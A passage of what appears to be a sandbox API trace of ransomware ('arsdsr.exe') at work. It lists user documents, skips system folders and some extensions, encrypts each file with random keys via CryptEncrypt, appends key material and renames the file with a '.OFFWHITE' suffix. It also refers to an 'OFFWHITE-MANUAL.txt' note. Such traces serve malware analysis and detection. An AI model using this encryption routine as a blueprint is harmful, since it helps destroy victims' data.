DKMbMx\\" [0132.971] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\*.*" [0132.971] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef1c14c0, ftCreationTime.dwHighDateTime=0x1d5db71, ftLastAccessTime.dwLowDateTime=0xeff49120, ftLastAccessTime.dwHighDateTime=0x1d5e6fb, ftLastWriteTime.dwLowDateTime=0xeff49120, ftLastWriteTime.dwHighDateTime=0x1d5e6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9a0098, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0132.975] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.975] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef1c14c0, ftCreationTime.dwHighDateTime=0x1d5db71, ftLastAccessTime.dwLowDateTime=0xeff49120, ftLastAccessTime.dwHighDateTime=0x1d5e6fb, ftLastWriteTime.dwLowDateTime=0xeff49120, ftLastWriteTime.dwHighDateTime=0x1d5e6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9a0098, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0132.975] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.975] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.976] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb78bc4e0, ftCreationTime.dwHighDateTime=0x1d5e3d4, ftLastAccessTime.dwLowDateTime=0x5ebb6ee0, ftLastAccessTime.dwHighDateTime=0x1d5dc1a, ftLastWriteTime.dwLowDateTime=0x5ebb6ee0, ftLastWriteTime.dwHighDateTime=0x1d5dc1a, nFileSizeHigh=0x0, nFileSizeLow=0x10b95, dwReserved0=0x9a0098, dwReserved1=0x295d670, cFileName="D1mhwLt2fzb_YQ.ots", cAlternateFileName="D1MHWL~1.OTS")) returned 1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2=".") returned 1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="..") returned 1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="...") returned 1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="windows") returned -1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="$recycle.bin") returned 1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="rsa") returned -1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="ntuser.dat") returned -1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="programdata") returned -1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="appdata") returned 1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="program files") returned -1 [0132.976] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="program files (x86)") returned -1 [0132.976] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\" [0132.976] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\", lpString2="D1mhwLt2fzb_YQ.ots" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots" [0132.976] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.976] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.976] PathFindExtensionW (pszPath="D1mhwLt2fzb_YQ.ots") returned=".ots" [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".exe") returned 1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".log") returned 1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".cab") returned 1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".cmd") returned 1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".com") returned 1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".cpl") returned 1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".url") returned -1 [0132.976] lstrcmpiW (lpString1=".ots", lpString2=".ttf") returned -1 [0132.977] lstrcmpiW (lpString1=".ots", lpString2=".mp3") returned 1 [0132.977] lstrcmpiW (lpString1=".ots", lpString2=".pif") returned -1 [0132.977] lstrcmpiW (lpString1=".ots", lpString2=".mp4") returned 1 [0132.977] lstrcmpiW (lpString1=".ots", lpString2=".OFFWHITE") returned 1 [0132.977] lstrcmpiW (lpString1=".ots", lpString2=".msi") returned 1 [0132.977] lstrcmpiW (lpString1="D1mhwLt2fzb_YQ.ots", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.977] GetProcessHeap () returned 0x500000 [0132.977] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f658 [0132.977] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\d1mhwlt2fzb_yq.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0132.979] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=68501) returned 1 [0132.979] GetProcessHeap () returned 0x500000 [0132.979] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.979] GetProcessHeap () returned 0x500000 [0132.979] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.979] GetProcessHeap () returned 0x500000 [0132.979] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.979] GetProcessHeap () returned 0x500000 [0132.979] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.979] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.979] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.980] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.980] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.980] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.980] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.980] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.980] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.980] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c910*=0x100) returned 1 [0132.980] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.980] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.980] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c90c*=0x100) returned 1 [0132.980] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x10b95, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.981] SetLastError (dwErrCode=0x0) [0132.981] WriteFile (in: hFile=0x1e4, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0132.985] GetLastError () returned 0x0 [0132.985] GetLastError () returned 0x0 [0132.985] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x10c95, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.985] WriteFile (in: hFile=0x1e4, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0132.985] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x10d95, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.985] WriteFile (in: hFile=0x1e4, lpBuffer=0x53f658*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x53f658*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0132.985] GetProcessHeap () returned 0x500000 [0132.985] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10b95) returned 0x55d7d0 [0132.985] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.985] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x10b95, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x10b95, lpOverlapped=0x0) returned 1 [0132.991] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.991] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x10b95, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x10b95, lpOverlapped=0x0) returned 1 [0132.991] GetProcessHeap () returned 0x500000 [0132.991] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0132.991] CloseHandle (hObject=0x1e4) returned 1 [0132.993] GetProcessHeap () returned 0x500000 [0132.993] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.993] GetProcessHeap () returned 0x500000 [0132.993] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.993] GetProcessHeap () returned 0x500000 [0132.993] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.993] GetProcessHeap () returned 0x500000 [0132.993] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.993] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots" [0132.994] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots.OFFWHITE" [0132.994] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\d1mhwlt2fzb_yq.ots"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\D1mhwLt2fzb_YQ.ots.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\d1mhwlt2fzb_yq.ots.offwhite")) returned 1 [0132.994] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x988d9d30, ftCreationTime.dwHighDateTime=0x1d5e054, ftLastAccessTime.dwLowDateTime=0x3e6cbbc0, ftLastAccessTime.dwHighDateTime=0x1d5dec3, ftLastWriteTime.dwLowDateTime=0x3e6cbbc0, ftLastWriteTime.dwHighDateTime=0x1d5dec3, nFileSizeHigh=0x0, nFileSizeLow=0x426a, dwReserved0=0x9a0098, dwReserved1=0x295d670, cFileName="drzrlM01uFTKeBD_.pptx", cAlternateFileName="DRZRLM~1.PPT")) returned 1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2=".") returned 1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="..") returned 1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="...") returned 1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="windows") returned -1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="$recycle.bin") returned 1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="rsa") returned -1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="ntuser.dat") returned -1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="programdata") returned -1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="appdata") returned 1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="program files") returned -1 [0132.995] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="program files (x86)") returned -1 [0132.995] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\" [0132.995] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\", lpString2="drzrlM01uFTKeBD_.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx" [0132.995] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.995] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.995] PathFindExtensionW (pszPath="drzrlM01uFTKeBD_.pptx") returned=".pptx" [0132.995] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0132.995] lstrcmpiW (lpString1=".pptx", lpString2=".log") returned 1 [0132.995] lstrcmpiW (lpString1=".pptx", lpString2=".cab") returned 1 [0132.995] lstrcmpiW (lpString1=".pptx", lpString2=".cmd") returned 1 [0132.995] lstrcmpiW (lpString1=".pptx", lpString2=".com") returned 1 [0132.995] lstrcmpiW (lpString1=".pptx", lpString2=".cpl") returned 1 [0132.995] lstrcmpiW (lpString1=".pptx", lpString2=".ini") returned 1 [0132.996] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0132.996] lstrcmpiW (lpString1=".pptx", lpString2=".url") returned -1 [0132.996] lstrcmpiW (lpString1=".pptx", lpString2=".ttf") returned -1 [0132.996] lstrcmpiW (lpString1=".pptx", lpString2=".mp3") returned 1 [0132.996] lstrcmpiW (lpString1=".pptx", lpString2=".pif") returned 1 [0132.996] lstrcmpiW (lpString1=".pptx", lpString2=".mp4") returned 1 [0132.996] lstrcmpiW (lpString1=".pptx", lpString2=".OFFWHITE") returned 1 [0132.996] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0132.996] lstrcmpiW (lpString1="drzrlM01uFTKeBD_.pptx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.996] GetProcessHeap () returned 0x500000 [0132.996] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f668 [0132.996] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\drzrlm01uftkebd_.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0132.996] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=17002) returned 1 [0132.996] GetProcessHeap () returned 0x500000 [0132.996] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.996] GetProcessHeap () returned 0x500000 [0132.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.997] GetProcessHeap () returned 0x500000 [0132.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.997] GetProcessHeap () returned 0x500000 [0132.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.997] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.997] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.997] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.997] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.997] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c910*=0x100) returned 1 [0132.998] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.998] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.998] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c90c*=0x100) returned 1 [0132.998] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x426a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.998] SetLastError (dwErrCode=0x0) [0132.998] WriteFile (in: hFile=0x1e4, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.000] GetLastError () returned 0x0 [0133.000] GetLastError () returned 0x0 [0133.000] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x436a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.000] WriteFile (in: hFile=0x1e4, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.001] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x446a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.001] WriteFile (in: hFile=0x1e4, lpBuffer=0x53f668*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x53f668*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0133.001] GetProcessHeap () returned 0x500000 [0133.001] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x426a) returned 0x55d7d0 [0133.001] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.001] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x426a, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x426a, lpOverlapped=0x0) returned 1 [0133.003] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.003] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x426a, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x426a, lpOverlapped=0x0) returned 1 [0133.003] GetProcessHeap () returned 0x500000 [0133.003] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0133.003] CloseHandle (hObject=0x1e4) returned 1 [0133.011] GetProcessHeap () returned 0x500000 [0133.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.011] GetProcessHeap () returned 0x500000 [0133.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.011] GetProcessHeap () returned 0x500000 [0133.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.011] GetProcessHeap () returned 0x500000 [0133.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.012] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx" [0133.012] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx.OFFWHITE" [0133.012] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\drzrlM01uFTKeBD_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\1goomn6oavxqs dkmbmx\\drzrlm01uftkebd_.pptx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS 